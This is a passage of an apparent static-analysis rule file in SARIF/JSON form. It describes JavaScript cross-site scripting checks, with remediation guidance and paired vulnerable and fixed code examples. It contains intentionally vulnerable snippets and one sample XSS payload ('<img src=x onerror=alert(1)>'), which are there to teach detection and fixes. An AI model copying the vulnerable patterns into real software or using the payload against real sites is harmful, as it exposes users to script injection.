injection","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/html-constructed-from-input","name":"js/html-constructed-from-input","shortDescription":{"text":"Unsafe HTML constructed from library input"},"fullDescription":{"text":"Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + name + \"</b>\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  const bold = document.createElement('b');\n  bold.innerText = name;\n  document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + striptags(name) + \"</b>\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + name + \"</b>\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  const bold = document.createElement('b');\n  bold.innerText = name;\n  document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + striptags(name) + \"</b>\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using externally controlled strings to construct HTML might allow a malicious\n              user to perform a cross-site scripting attack.","id":"js/html-constructed-from-input","kind":"path-problem","name":"Unsafe HTML constructed from library input","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/stored-xss","name":"js/stored-xss","shortDescription":{"text":"Stored cross-site scripting"},"fullDescription":{"text":"Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // BAD: `fileName` can contain HTML elements\n            list += '<li>' + fileName + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs'),\n    escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // GOOD: escaped `fileName` can not contain HTML elements\n            list += '<li>' + escape(fileName) + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // BAD: `fileName` can contain HTML elements\n            list += '<li>' + fileName + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs'),\n    escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // GOOD: escaped `fileName` can not contain HTML elements\n            list += '<li>' + escape(fileName) + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using uncontrolled stored values in HTML allows for\n              a stored cross-site scripting vulnerability.","id":"js/stored-xss","kind":"path-problem","name":"Stored cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/reflected-xss","name":"js/reflected-xss","shortDescription":{"text":"Reflected cross-site scripting"},"fullDescription":{"text":"Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // BAD: a request parameter is incorporated without validation into the response\n    res.send(\"Unknown user: \" + req.params.id);\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // GOOD: request parameter is sanitized before incorporating it into the response\n    res.send(\"Unknown user: \" + escape(req.params.id));\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // BAD: a request parameter is incorporated without validation into the response\n    res.send(\"Unknown user: \" + req.params.id);\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // GOOD: request parameter is sanitized before incorporating it into the response\n    res.send(\"Unknown user: \" + escape(req.params.id));\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Writing user input directly to an HTTP response allows for\n              a cross-site scripting vulnerability.","id":"js/reflected-xss","kind":"path-problem","name":"Reflected cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/xss-through-dom","name":"js/xss-through-dom","shortDescription":{"text":"DOM text reinterpreted as HTML"},"fullDescription":{"text":"Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n    $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n    $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Reinterpreting text from the DOM as HTML\n              can lead to a cross-site scripting vulnerability.","id":"js/xss-through-dom","kind":"path-problem","name":"DOM text reinterpreted as HTML","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/xss-through-exception","name":"js/xss-through-exception","shortDescription":{"text":"Exception text reinterpreted as HTML"},"fullDescription":{"text":"Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    \n    try {\n        var parsed = unknownParseFunction(deflt); \n    } catch(e) {\n        document.write(\"Had an error: \" + e + \".\");\n    }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n    if (!ajv.validate('pollData', req.body)) {\n        res.send(ajv.errorsText());\n    }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'<img src=x onerror=alert(1)>': 'foo'}` will generate the error `data/<img src=x onerror=alert(1)> should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    \n    try {\n        var parsed = unknownParseFunction(deflt); \n    } catch(e) {\n        document.write(\"Had an error: \" + e + \".\");\n    }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n    if (!ajv.validate('pollData', req.body)) {\n        res.send(ajv.errorsText());\n    }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'<img src=x onerror=alert(1)>': 'foo'}` will generate the error `data/<img src=x onerror=alert(1)> should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Reinterpreting text from an exception as HTML\n              can lead to a cross-site scripting vulnerability.","id":"js/xss-through-exception","kind":"path-problem","name":"Exception text reinterpreted as HTML","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/unsafe-jquery-plugin","name":"js/unsafe-jquery-plugin","shortDescription":{"text":"Unsafe jQuery plugin"},"fullDescription":{"text":"A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t    text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116","frameworks/jquery"],"description":"A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.","id":"js/unsafe-jquery-plugin","kind":"path-problem","name":"Unsafe jQuery plugin","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/xss","name":"js/xss","shortDescription":{"text":"Client-side cross-site scripting"},"fullDescription":{"text":"Writing user input directly to the DOM allows for a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    document.write(\"<OPTION value=1>\"+deflt+\"</OPTION>\");\n    document.write(\"<OPTION value=2>English</OPTION>\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that 